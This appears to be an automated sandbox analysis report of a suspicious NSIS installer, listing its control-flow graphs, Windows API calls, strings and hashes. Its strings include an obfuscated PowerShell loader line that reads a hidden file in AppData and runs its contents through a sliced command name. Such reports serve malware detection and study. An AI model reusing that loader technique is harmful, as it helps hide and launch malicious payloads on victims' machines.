3579->3580 3580->3577 3590 4057b3 lstrlenA 3580->3590 3583 4059e6 lstrcpyA 3586 405a08 3583->3586 3584 4059fa 3585 4057b3 4 API calls 3584->3585 3585->3586 3587 405a3f SetFilePointer WriteFile GlobalFree 3586->3587 3587->3577 3588->3569 3589->3575 3591 4057f4 lstrlenA 3590->3591 3592 4057cd lstrcmpiA 3591->3592 3593 4057fc 3591->3593 3592->3593 3594 4057eb CharNextA 3592->3594 3593->3583 3593->3584 3594->3591 4244 402036 4245 4029fd 18 API calls 4244->4245 4246 40203d 4245->4246 4247 4029fd 18 API calls 4246->4247 4248 402047 4247->4248 4249 4029fd 18 API calls 4248->4249 4250 402051 4249->4250 4251 4029fd 18 API calls 4250->4251 4252 40205b 4251->4252 4253 4029fd 18 API calls 4252->4253 4254 402064 4253->4254 4255 40207a CoCreateInstance 4254->4255 4256 4029fd 18 API calls 4254->4256 4259 402099 4255->4259 4261 40214d 4255->4261 4256->4255 4257 401423 25 API calls 4258 402181 4257->4258 4260 40212f MultiByteToWideChar 4259->4260 4259->4261 4260->4261 4261->4257 4261->4258 4269 4014b7 4270 4014bd 4269->4270 4271 401389 2 API calls 4270->4271 4272 4014c5 4271->4272 4273 401bb8 4274 4029e0 18 API calls 4273->4274 4275 401bbf 4274->4275 4276 4029e0 18 API calls 4275->4276 4277 401bc9 4276->4277 4278 401bd9 4277->4278 4279 4029fd 18 API calls 4277->4279 4280 401be9 4278->4280 4281 4029fd 18 API calls 4278->4281 4279->4278 4282 401bf4 4280->4282 4283 401c38 4280->4283 4281->4280 4284 4029e0 18 API calls 4282->4284 4285 4029fd 18 API calls 4283->4285 4286 401bf9 4284->4286 4287 401c3d 4285->4287 4288 4029e0 18 API calls 4286->4288 4289 4029fd 18 API calls 4287->4289 4290 401c02 4288->4290 4291 401c46 FindWindowExA 4289->4291 4292 401c28 SendMessageA 4290->4292 4293 401c0a SendMessageTimeoutA 4290->4293 4294 401c64 4291->4294 4292->4294 4293->4294 3595 40243a 3606 402b07 3595->3606 3597 402444 3610 4029e0 3597->3610 3599 40244d 3600 402457 3599->3600 3604 402663 3599->3604 3601 402470 RegEnumValueA 3600->3601 3602 402464 RegEnumKeyA 3600->3602 3603 402489 RegCloseKey 3601->3603 3601->3604 3602->3603 3603->3604 3607 4029fd 18 API calls 3606->3607 3608 402b20 3607->3608 3609 402b2e RegOpenKeyExA 3608->3609 3609->3597 3611 405bdf 18 API calls 3610->3611 3612 4029f4 3611->3612 3612->3599 3613 40223b 3614 402243 3613->3614 3615 402249 3613->3615 3616 4029fd 18 API calls 3614->3616 3617 402259 3615->3617 3618 4029fd 18 API calls 3615->3618 3616->3615 3619 402267 3617->3619 3620 4029fd 18 API calls 3617->3620 3618->3617 3621 4029fd 18 API calls 3619->3621 3620->3619 3622 402270 WritePrivateProfileStringA 3621->3622 4295 403fbc 4296 403fd2 4295->4296 4301 4040de 4295->4301 4299 403e73 19 API calls 4296->4299 4297 40414d 4298 404221 4297->4298 4300 404157 GetDlgItem 4297->4300 4306 403eda 8 API calls 4298->4306 4302 404028 4299->4302 4303 40416d 4300->4303 4304 4041df 4300->4304 4301->4297 4301->4298 4305 404122 GetDlgItem SendMessageA 4301->4305 4307 403e73 19 API calls 4302->4307 4303->4304 4308 404193 6 API calls 4303->4308 4304->4298 4309 4041f1 4304->4309 4326 403e95 KiUserCallbackDispatcher 4305->4326 4311 40421c 4306->4311 4312 404035 CheckDlgButton 4307->4312 4308->4304 4313 4041f7 SendMessageA 4309->4313 4314 404208 4309->4314 4324 403e95 KiUserCallbackDispatcher 4312->4324 4313->4314 4314->4311 4318 40420e SendMessageA 4314->4318 4315 404148 4319 404246 SendMessageA 4315->4319 4317 404053 GetDlgItem 4325 403ea8 SendMessageA 4317->4325 4318->4311 4319->4297 4321 404069 SendMessageA 4322 404090 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4321->4322 4323 404087 GetSysColor 4321->4323 4322->4311 4323->4322 4324->4317 4325->4321 4326->4315 3654 40173f 3655 4029fd 18 API calls 3654->3655 3656 401746 3655->3656 3657 401764 3656->3657 3658 40176c 3656->3658 3693 405bbd lstrcpynA 3657->3693 3694 405bbd lstrcpynA 3658->3694 3661 401777 3663 40564d 3 API calls 3661->3663 3662 40176a 3665 405e28 5 API calls 3662->3665 3664 40177d lstrcatA 3663->3664 3664->3662 3677 401789 3665->3677 3666 405ec1 2 API calls 3666->3677 3667 405829 2 API calls 3667->3677 3669 4017a0 CompareFileTime 3669->3677 3670 401864 3671 404ea6 25 API calls 3670->3671 3674 40186e 3671->3674 3672 404ea6 25 API calls 3681 401850 3672->3681 3673 405bbd lstrcpynA 3673->3677 3675 402e62 37 API calls 3674->3675 3676 401881 3675->3676 3678 401895 SetFileTime 3676->3678 3680 4018a7 CloseHandle 3676->3680 3677->3666 3677->3667 3677->3669 3677->3670 3677->3673 3679 405bdf 18 API calls 3677->3679 3689 4053d1 MessageBoxIndirectA 3677->3689 3690 40183b 3677->3690 3692 40584e GetFileAttributesA CreateFileA 3677->3692 3678->3680 3679->3677 3680->3681 3682 4018b8 3680->3682 3683 4018d0 3682->3683 3684 4018bd 3682->3684 3686 405bdf 18 API calls 3683->3686 3685 405bdf 18 API calls 3684->3685 3687 4018c5 lstrcatA 3685->3687 3688 4018d8 3686->3688 3687->3688 3691 4053d1 MessageBoxIndirectA 3688->3691 3689->3677 3690->3672 3690->3681 3691->3681 3692->3677 3693->3662 3694->3661 4327 40163f 4328 4029fd 18 API calls 4327->4328 4329 401645 4328->4329 4330 405ec1 2 API calls 4329->4330 4331 40164b 4330->4331 4332 40193f 4333 4029e0 18 API calls 4332->4333 4334 401946 4333->4334 4335 4029e0 18 API calls 4334->4335 4336 401950 4335->4336 4337 4029fd 18 API calls 4336->4337 4338 401959 4337->4338 4339 40196c lstrlenA 4338->4339 4343 4019a7 4338->4343 4340 401976 4339->4340 4340->4343 4345 405bbd lstrcpynA 4340->4345 4342 401990 4342->4343 4344 40199d lstrlenA 4342->4344 4344->4343 4345->4342

                                                                                                                                            Executed Functions

                                                                                                                                            Function 004030B6 Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 337stringfilecomCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 4030b6-40314d #17 SetErrorMode OleInitialize call 405ee8 SHGetFileInfoA call 405bbd GetCommandLineA call 405bbd GetModuleHandleA 7 403159-40316e call 405678 CharNextA 0->7 8 40314f-403154 0->8 11 403233-403237 7->11 8->7 12 403173-403176 11->12 13 40323d 11->13 15 403178-40317c 12->15 16 40317e-403186 12->16 14 403250-40326a GetTempPathA call 403082 13->14 25 4032c2-4032dc DeleteFileA call 402c29 14->25 26 40326c-40328a GetWindowsDirectoryA lstrcatA call 403082 14->26 15->15 15->16 17 403188-403189 16->17 18 40318e-403191 16->18 17->18 20 403223-403230 call 405678 18->20 21 403197-40319b 18->21 20->11 40 403232 20->40 23 4031b3-4031e0 21->23 24 40319d-4031a3 21->24 30 4031e2-4031e8 23->30 31 4031f3-403221 23->31 28 4031a5-4031a7 24->28 29 4031a9 24->29 41 403370-40337f call 403534 OleUninitialize 25->41 42 4032e2-4032e8 25->42 26->25 44 40328c-4032bc GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403082 26->44 28->23 28->29 29->23 35 4031ea-4031ec 30->35 36 4031ee 30->36 31->20 38 40323f-40324b call 405bbd 31->38 35->31 35->36 36->31 38->14 40->11 55 403385-403395 call 4053d1 ExitProcess 41->55 56 403479-40347f 41->56 45 403360-403367 call 40360e 42->45 46 4032ea-4032f5 call 405678 42->46 44->25 44->41 53 40336c 45->53 59 4032f7-403320 46->59 60 40332b-403335 46->60 53->41 57 403485-4034a2 call 405ee8 * 3 56->57 58 40351c-403524 56->58 88 4034a4-4034a6 57->88 89 4034ec-4034fa call 405ee8 57->89 67 403526 58->67 68 40352a-40352e ExitProcess 58->68 63 403322-403324 59->63 64 403337-403344 call 40573b 60->64 65 40339b-4033b5 lstrcatA lstrcmpiA 60->65 63->60 70 403326-403329 63->70 64->41 78 403346-40335c call 405bbd * 2 64->78 65->41 72 4033b7-4033cc CreateDirectoryA SetCurrentDirectoryA 65->72 67->68 70->60 70->63 75 4033d9-403401 call 405bbd 72->75 76 4033ce-4033d4 call 405bbd 72->76 84 403407-403423 call 405bdf DeleteFileA 75->84 76->75 78->45 95 403464-40346b 84->95 96 403425-403435 CopyFileA 84->96 88->89 93 4034a8-4034aa 88->93 100 403508-403513 ExitWindowsEx 89->100 101 4034fc-403506 89->101 93->89 98 4034ac-4034be GetCurrentProcess 93->98 95->84 102 40346d-403474 call 405a71 95->102 96->95 99 403437-403457 call 405a71 call 405bdf call 40536c 96->99 98->89 110 4034c0-4034e2 98->110 99->95 117 403459-403460 CloseHandle 99->117 100->58 104 403515-403517 call 40140b 100->104 101->100 101->104 102->41 104->58 110->89 117->95
                                                                                                                                            APIs
                                                                                                                                            • #17.COMCTL32 ref: 004030D7
                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004030E2
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004030E9
                                                                                                                                              • Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
                                                                                                                                              • Part of subcall function 00405EE8: LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
                                                                                                                                              • Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16
                                                                                                                                            • SHGetFileInfoA.SHELL32(0041EC98,00000000,?,00000160,00000000,00000009), ref: 00403111
                                                                                                                                              • Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Originals Setup,NSIS Error), ref: 00405BCA
                                                                                                                                            • GetCommandLineA.KERNEL32(Originals Setup,NSIS Error), ref: 00403126
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000000), ref: 00403139
                                                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000020), ref: 00403164
                                                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403261
                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403272
                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040327E
                                                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403292
                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040329A
                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032AB
                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032B3
                                                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 004032C7
                                                                                                                                            • OleUninitialize.OLE32(?), ref: 00403375
                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403395
                                                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000000,?), ref: 004033A1
                                                                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033AD
                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033B9
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033C0
                                                                                                                                            • DeleteFileA.KERNEL32(0041E898,0041E898,?,"$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,?), ref: 00403419
                                                                                                                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\HVSU7GbA5N.exe,0041E898,00000001), ref: 0040342D
                                                                                                                                            • CloseHandle.KERNEL32(00000000,0041E898,0041E898,?,0041E898,00000000), ref: 0040345A
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 004034B3
                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040350B
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040352E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                            • String ID: "$"$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $"C:\Users\user\Desktop\HVSU7GbA5N.exe"$1033$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\HVSU7GbA5N.exe$Error launching installer$Low$NSIS Error$Originals Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                            • API String ID: 4107622049-1981984989
                                                                                                                                            • Opcode ID: a2a75be3d011132d4618424123a2539fe2665dee191949de8570e11e155f9849
                                                                                                                                            • Instruction ID: 19acd6a9e22a62aa3fa635d9352380a3979e711e0520c28b60a65d3217cef685
                                                                                                                                            • Opcode Fuzzy Hash: a2a75be3d011132d4618424123a2539fe2665dee191949de8570e11e155f9849
                                                                                                                                            • Instruction Fuzzy Hash: 87B1E370A082516AE7216F755C89B2B7EACEB45306F04057FF581B62D2C77C9E01CB6E
                                                                                                                                            Function 00404FE4 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 118 404fe4-405000 119 405006-4050cd GetDlgItem * 3 call 403ea8 call 404744 GetClientRect GetSystemMetrics SendMessageA * 2 118->119 120 40518f-405195 118->120 138 4050eb-4050ee 119->138 139 4050cf-4050e9 SendMessageA * 2 119->139 122 405197-4051b9 GetDlgItem CreateThread CloseHandle 120->122 123 4051bf-4051cb 120->123 122->123 125 4051ed-4051f3 123->125 126 4051cd-4051d3 123->126 130 4051f5-4051fb 125->130 131 405248-40524b 125->131 128 4051d5-4051e8 ShowWindow * 2 call 403ea8 126->128 129 40520e-405215 call 403eda 126->129 128->125 142 40521a-40521e 129->142 135 405221-405231 ShowWindow 130->135 136 4051fd-405209 call 403e4c 130->136 131->129 133 40524d-405253 131->133 133->129 140 405255-405268 SendMessageA 133->140 143 405241-405243 call 403e4c 135->143 144 405233-40523c call 404ea6 135->144 136->129 147 4050f0-4050fc SendMessageA 138->147 148 4050fe-405115 call 403e73 138->148 139->138 149 405365-405367 140->149 150 40526e-40529a CreatePopupMenu call 405bdf AppendMenuA 140->150 143->131 144->143 147->148 157 405117-40512b ShowWindow 148->157 158 40514b-40516c GetDlgItem SendMessageA 148->158 149->142 155 40529c-4052ac GetWindowRect 150->155 156 4052af-4052c5 TrackPopupMenu 150->156 155->156 156->149 160 4052cb-4052e5 156->160 161 40513a 157->161 162 40512d-405138 ShowWindow 157->162 158->149 159 405172-40518a SendMessageA * 2 158->159 159->149 163 4052ea-405305 SendMessageA 160->163 164 405140-405146 call 403ea8 161->164 162->164 163->163 165 405307-405327 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 164->158 167 405329-405349 SendMessageA 165->167 167->167 168 40534b-40535f GlobalUnlock SetClipboardData CloseClipboard 167->168 168->149
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405043
                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405052
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040508F
                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405096
                                                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004050B7
                                                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050C8
                                                                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 004050DB
                                                                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050E9
                                                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050FC
                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040511E
                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405132
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405153
                                                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405163
                                                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040517C
                                                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405188
                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405061
                                                                                                                                              • Part of subcall function 00403EA8: SendMessageA.USER32(00000028,?,00000001,00403CD9), ref: 00403EB6
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004051A4
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004F78,00000000), ref: 004051B2
                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004051B9
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004051DC
                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051E3
                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405229
                                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040525D
                                                                                                                                            • CreatePopupMenu.USER32 ref: 0040526E
                                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405283
                                                                                                                                            • GetWindowRect.USER32(?,000000FF), ref: 004052A3
                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052BC
                                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F8
                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405308
                                                                                                                                            • EmptyClipboard.USER32 ref: 0040530E
                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405317
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405321
                                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405335
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040534E
                                                                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405359
                                                                                                                                            • CloseClipboard.USER32 ref: 0040535F
                                                                                                                                            Strings
                                                                                                                                            • Originals Setup: Completed, xrefs: 004052D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                            • String ID: Originals Setup: Completed
                                                                                                                                            • API String ID: 590372296-1959725480
                                                                                                                                            • Opcode ID: 7afbd6bb534d64d4964d763d2f7a56bb17a1bb4ac360bf80618473dd1d5dafb6
                                                                                                                                            • Instruction ID: 5eb751775e690fc0911b0246dac1cecdda29a979763143f7b886e47eaa108cfb
                                                                                                                                            • Opcode Fuzzy Hash: 7afbd6bb534d64d4964d763d2f7a56bb17a1bb4ac360bf80618473dd1d5dafb6
                                                                                                                                            • Instruction Fuzzy Hash: 8AA16971900208BFDB219FA0DD89EAE7F79FB08345F10407AFA01B61A0C7B55E519FA9
                                                                                                                                            Function 00405BDF Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 410 405bdf-405bea 411 405bec-405bfb 410->411 412 405bfd-405c12 410->412 411->412 413 405e05-405e09 412->413 414 405c18-405c23 412->414 416 405c35-405c3f 413->416 417 405e0f-405e19 413->417 414->413 415 405c29-405c30 414->415 415->413 416->417 418 405c45-405c4c 416->418 419 405e24-405e25 417->419 420 405e1b-405e1f call 405bbd 417->420 421 405c52-405c87 418->421 422 405df8 418->422 420->419 424 405da2-405da5 421->424 425 405c8d-405c98 GetVersion 421->425 426 405e02-405e04 422->426 427 405dfa-405e00 422->427 430 405dd5-405dd8 424->430 431 405da7-405daa 424->431 428 405cb2 425->428 429 405c9a-405c9e 425->429 426->413 427->413 437 405cb9-405cc0 428->437 429->428 434 405ca0-405ca4 429->434 432 405de6-405df6 lstrlenA 430->432 433 405dda-405de1 call 405bdf 430->433 435 405dba-405dc6 call 405bbd 431->435 436 405dac-405db8 call 405b1b 431->436 432->413 433->432 434->428 439 405ca6-405caa 434->439 448 405dcb-405dd1 435->448 436->448 441 405cc2-405cc4 437->441 442 405cc5-405cc7 437->442 439->428 444 405cac-405cb0 439->444 441->442 446 405d00-405d03 442->446 447 405cc9-405ce4 call 405aa4 442->447 444->437 449 405d13-405d16 446->449 450 405d05-405d11 GetSystemDirectoryA 446->450 453 405ce9-405cec 447->453 448->432 452 405dd3 448->452 456 405d80-405d82 449->456 457 405d18-405d26 GetWindowsDirectoryA 449->457 455 405d84-405d87 450->455 454 405d9a-405da0 call 405e28 452->454 458 405cf2-405cfb call 405bdf 453->458 459 405d89-405d8d 453->459 454->432 455->454 455->459 456->455 460 405d28-405d32 456->460 457->456 458->455 459->454 463 405d8f-405d95 lstrcatA 459->463 465 405d34-405d37 460->465 466 405d4c-405d62 SHGetSpecialFolderLocation 460->466 463->454 465->466 468 405d39-405d40 465->468 469 405d64-405d7b SHGetPathFromIDListA CoTaskMemFree 466->469 470 405d7d 466->470 471 405d48-405d4a 468->471 469->455 469->470 470->456 471->455 471->466
                                                                                                                                            APIs
                                                                                                                                            • GetVersion.KERNEL32(?,Completed,00000000,00404EDE,Completed,00000000), ref: 00405C90
                                                                                                                                            • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405D0B
                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405D1E
                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0040E888), ref: 00405D5A
                                                                                                                                            • SHGetPathFromIDListA.SHELL32(0040E888,: Completed), ref: 00405D68
                                                                                                                                            • CoTaskMemFree.OLE32(0040E888), ref: 00405D73
                                                                                                                                            • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D95
                                                                                                                                            • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00404EDE,Completed,00000000), ref: 00405DE7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                            • String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                            • API String ID: 900638850-4250441434
                                                                                                                                            • Opcode ID: 6d1c9af88ffa3db3a0edcf81b4fc072c50c4b8bcf17ecc15cdbe89ff62f1b448
                                                                                                                                            • Instruction ID: 05ce3077703b195791b94b96109b54625272672628b9f98d23919b5af99ad588
                                                                                                                                            • Opcode Fuzzy Hash: 6d1c9af88ffa3db3a0edcf81b4fc072c50c4b8bcf17ecc15cdbe89ff62f1b448
                                                                                                                                            • Instruction Fuzzy Hash: 0A610171A04A05AAEB205F24DC88BBF7BB4EF11304F50813BE941B62D0D27D5982DF8E
                                                                                                                                            Function 00406197 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
